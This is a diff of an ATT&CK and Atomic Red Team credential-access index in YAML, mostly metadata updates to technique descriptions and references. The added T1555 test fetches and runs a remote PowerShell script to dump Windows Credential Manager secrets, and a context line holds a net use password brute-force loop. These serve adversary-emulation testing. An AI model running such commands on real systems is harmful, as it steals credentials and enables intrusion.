@@ credential-access: It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - AWS @@ -17460,18 +18265,7 @@ credential-access: elevation_required: true T1110.004: technique: - external_references: - - source_name: mitre-attack - external_id: T1110.004 - url: https://attack.mitre.org/techniques/T1110/004 - - source_name: US-CERT TA18-068A 2018 - url: https://www.us-cert.gov/ncas/alerts/TA18-086A - description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted - by Cyber Actors. Retrieved October 2, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Credential Stuffing + id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc description: |- Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. @@ -17493,27 +18287,27 @@ credential-access: * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) - id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc + name: Credential Stuffing + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1110.004 + url: https://attack.mitre.org/techniques/T1110/004 + - external_id: CAPEC-600 + source_name: capec + url: https://capec.mitre.org/data/definitions/600.html + - source_name: US-CERT TA18-068A 2018 + url: https://www.us-cert.gov/ncas/alerts/TA18-086A + description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted + by Cyber Actors. Retrieved October 2, 2019. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-29T20:35:36.694Z' + modified: '2020-10-19T22:43:45.475Z' created: '2020-02-11T18:39:59.959Z' - x_mitre_contributors: - - Diogo Fernandes - - Anastasios Pingios - x_mitre_data_sources: - - Authentication logs - - Office 365 account logs - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor authentication logs for system and application login - failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If - authentication failures are high, then there may be a brute force attempt - to gain access to a system using legitimate credentials. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - macOS @@ -17524,6 +18318,20 @@ credential-access: - Office 365 - Azure AD - SaaS + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + x_mitre_detection: Monitor authentication logs for system and application login + failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If + authentication failures are high, then there may be a brute force attempt + to gain access to a system using legitimate credentials. + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - Authentication logs + - Office 365 account logs + x_mitre_contributors: + - Diogo Fernandes + - Anastasios Pingios atomic_tests: [] T1552.001: technique: @@ -17689,7 +18497,39 @@ credential-access: - File monitoring - Process monitoring - System calls - atomic_tests: [] + identifier: T1555 + atomic_tests: + - name: Extract Windows Credential Manager via VBA + auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + description: | + This module will extract the credentials found within the Windows credential manager and dump + them to $env:TEMP\windows-credentials.txt + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft Word must be installed + +' + prereq_command: | + try { + New-Object -COMObject "word.Application" | Out-Null + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" + cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction + Ignore + +' + name: powershell T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -18041,11 +18881,11 @@ credential-access: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domain Controller Authentication - description: "Adversaries may patch the authentication process on a domain control + description: "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication - process on a domain control with the intent of creating a backdoor used to - access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). + process on a domain controller with the intent of creating a backdoor used + to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password @@ -18060,7 +18900,7 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:51:30.829Z' + modified: '2020-08-26T14:16:48.125Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - Authentication logs @@ -18147,22 +18987,14 @@ credential-access: atomic_tests: [] T1187: technique: - id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Forced Authentication - description: |- - Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. - - The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. - - Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security) - - Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB) - - There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include: - - * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017) - * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017) + created: '2018-01-16T16:13:52.465Z' + modified: '2020-06-19T17:16:41.470Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1187 @@ -18196,32 +19028,40 @@ credential-access: Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.' source_name: US-CERT APT Energy Oct 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-06-19T17:16:41.470Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located. + description: |- + Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. - Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017) + The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. + + Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security) + + Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB) + + There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include: + + * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017) + * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017) + name: Forced Authentication + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2 + x_mitre_version: '1.2' + x_mitre_contributors: + - Teodor Cimpoesu + - Sudhanshu Chauhan, @Sudhanshu_C x_mitre_data_sources: - File monitoring - Network protocol analysis - Network device logs - Process use of network - x_mitre_contributors: - - Teodor Cimpoesu - - Sudhanshu Chauhan, @Sudhanshu_C - x_mitre_version: '1.2' + x_mitre_detection: |- + Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located. + + Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017) + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1056.002: technique: @@ -18257,7 +19097,7 @@ credential-access: are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: - [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries + [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: @@ -18566,9 +19406,9 @@ credential-access: phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T21:29:13.900Z' + modified: '2020-10-21T01:31:35.760Z' created: '2017-05-31T21:30:48.323Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: @@ -18598,6 +19438,7 @@ credential-access: - Linux - macOS - Windows + - Network x_mitre_is_subtechnique: false atomic_tests: [] T1558.003: @@ -18636,6 +19477,9 @@ credential-access: - source_name: mitre-attack external_id: T1558.003 url: https://attack.mitre.org/techniques/T1558/003 + - external_id: CAPEC-509 + source_name: capec + url: https://capec.mitre.org/data/definitions/509.html - url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018. @@ -18660,6 +19504,7 @@ credential-access: - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018. source_name: SANS Attacking Kerberos Nov 2014 + url: https://redsiege.com/kerberoast-slides - url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018. @@ -18668,7 +19513,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-02-27T18:25:30.124Z' + modified: '2020-10-20T19:30:10.687Z' created: '2020-02-11T18:43:38.588Z' x_mitre_contributors: - Praetorian @@ -18686,7 +19531,7 @@ credential-access: x_mitre_platforms: - Windows x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1558.003 atomic_tests: - name: Request for service tickets @@ -18781,15 +19626,21 @@ credential-access: T1056.001: technique: id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: |- - Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. - - Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include: - - * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data. - * Reading raw keystroke data from the hardware buffer. - * Windows Registry modifications. - * Custom drivers. + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " name: Keylogging created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -18805,20 +19656,25 @@ credential-access: description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.' source_name: Adventures of a Keystroke + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T20:45:52.998Z' + modified: '2020-10-21T01:30:56.227Z' created: '2020-02-11T18:58:11.791Z' x_mitre_platforms: - Windows - macOS - Linux + - Network x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, @@ -19059,29 +19915,13 @@ credential-access: elevation_required: true T1003.001: technique: - external_references: - - source_name: mitre-attack - external_id: T1003.001 - url: https://attack.mitre.org/techniques/T1003/001 - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ - description: Wilson, B. (2016, April 18). The Importance of KB2871997 and - KB2928120 for Credential Protection. Retrieved April 11, 2018. - source_name: TechNet Blogs Credential Protection - - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords - from Memory. Retrieved October 11, 2019. - url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea - source_name: Medium Detecting Attempts to Steal Passwords from Memory - - url: https://github.com/mattifestation/PowerSploit - description: PowerSploit. (n.d.). Retrieved December 4, 2014. - source_name: Powersploit - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LSASS Memory + created: '2020-02-11T18:41:44.783Z' + modified: '2020-06-09T20:46:00.393Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90 description: | Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). @@ -19105,32 +19945,48 @@ credential-access: * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) - id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-06-09T20:46:00.393Z' - created: '2020-02-11T18:41:44.783Z' - x_mitre_contributors: - - Ed Williams, Trustwave, SpiderLabs - x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - Process monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM + name: LSASS Memory + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1003.001 + url: https://attack.mitre.org/techniques/T1003/001 + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ + description: Wilson, B. (2016, April 18). The Importance of KB2871997 and + KB2928120 for Credential Protection. Retrieved April 11, 2018. + source_name: TechNet Blogs Credential Protection + - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords + from Memory. Retrieved October 11, 2019. + url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea + source_name: Medium Detecting Attempts to Steal Passwords from Memory + - url: https://github.com/mattifestation/PowerSploit + description: PowerSploit. (n.d.). Retrieved December 4, 2014. + source_name: Powersploit + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_data_sources: + - Process command-line parameters + - PowerShell logs + - Process monitoring + x_mitre_contributors: + - Ed Williams, Trustwave, SpiderLabs identifier: T1003.001 atomic_tests: - name: Windows Credential Editor @@ -19416,7 +20272,7 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-03-31T13:54:08.535Z' + modified: '2020-10-16T15:19:48.733Z' created: '2020-02-11T19:07:12.114Z' x_mitre_contributors: - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project @@ -19429,7 +20285,7 @@ credential-access: - Packet capture x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -19477,7 +20333,7 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.762Z' + modified: '2020-10-21T02:41:11.743Z' created: '2020-02-11T19:01:56.887Z' x_mitre_data_sources: - File monitoring @@ -19508,12 +20364,13 @@ credential-access: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows - Linux - macOS + - Network atomic_tests: [] T1003.003: technique: @@ -19775,6 +20632,54 @@ credential-access: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + T1556.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.004 + url: https://attack.mitre.org/techniques/T1556/004 + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. + + [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) + name: Network Device Authentication + id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-21T02:41:11.550Z' + created: '2020-10-19T17:58:04.155Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). + x_mitre_data_sources: + - File monitoring + x_mitre_platforms: + - Network + atomic_tests: [] T1040: technique: created: '2017-05-31T21:30:41.399Z' @@ -20169,6 +21074,9 @@ credential-access: - source_name: mitre-attack external_id: T1110.002 url: https://attack.mitre.org/techniques/T1110/002 + - external_id: CAPEC-55 + source_name: capec + url: https://capec.mitre.org/data/definitions/55.html - url: https://en.wikipedia.org/wiki/Password_cracking description: Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015. @@ -20193,7 +21101,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-07-09T17:01:18.054Z' + modified: '2020-09-16T15:39:59.041Z' created: '2020-02-11T18:38:56.197Z' x_mitre_data_sources: - Authentication logs @@ -20205,7 +21113,7 @@ credential-access: efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux @@ -20359,10 +21267,13 @@ credential-access: - source_name: mitre-attack external_id: T1110.001 url: https://attack.mitre.org/techniques/T1110/001 - - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + - external_id: CAPEC-49 + source_name: capec + url: https://capec.mitre.org/data/definitions/49.html + - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - source_name: Cylance Cleaver + url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf - source_name: US-CERT TA18-068A 2018 url: https://www.us-cert.gov/ncas/alerts/TA18-086A description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted @@ -20399,7 +21310,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-29T17:11:46.504Z' + modified: '2020-10-19T22:43:45.126Z' created: '2020-02-11T18:38:22.617Z' x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) @@ -20412,7 +21323,7 @@ credential-access: failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux @@ -20463,12 +21374,6 @@ credential-access: @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL T1110.003: technique: - created: '2020-02-11T18:39:25.122Z' - modified: '2020-03-29T17:13:57.172Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c description: |- Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) @@ -20499,6 +21404,9 @@ credential-access: - source_name: mitre-attack external_id: T1110.003 url: https://attack.mitre.org/techniques/T1110/003 + - external_id: CAPEC-565 + source_name: capec + url: https://capec.mitre.org/data/definitions/565.html - url: http://www.blackhillsinfosec.com/?p=4645 description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017. @@ -20511,6 +21419,12 @@ credential-access: url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-10-19T22:43:45.579Z' + created: '2020-02-11T18:39:25.122Z' x_mitre_platforms: - Linux - macOS @@ -20522,7 +21436,7 @@ credential-access: - Azure AD - SaaS x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- Monitor authentication logs for system and application login failures of [Valid 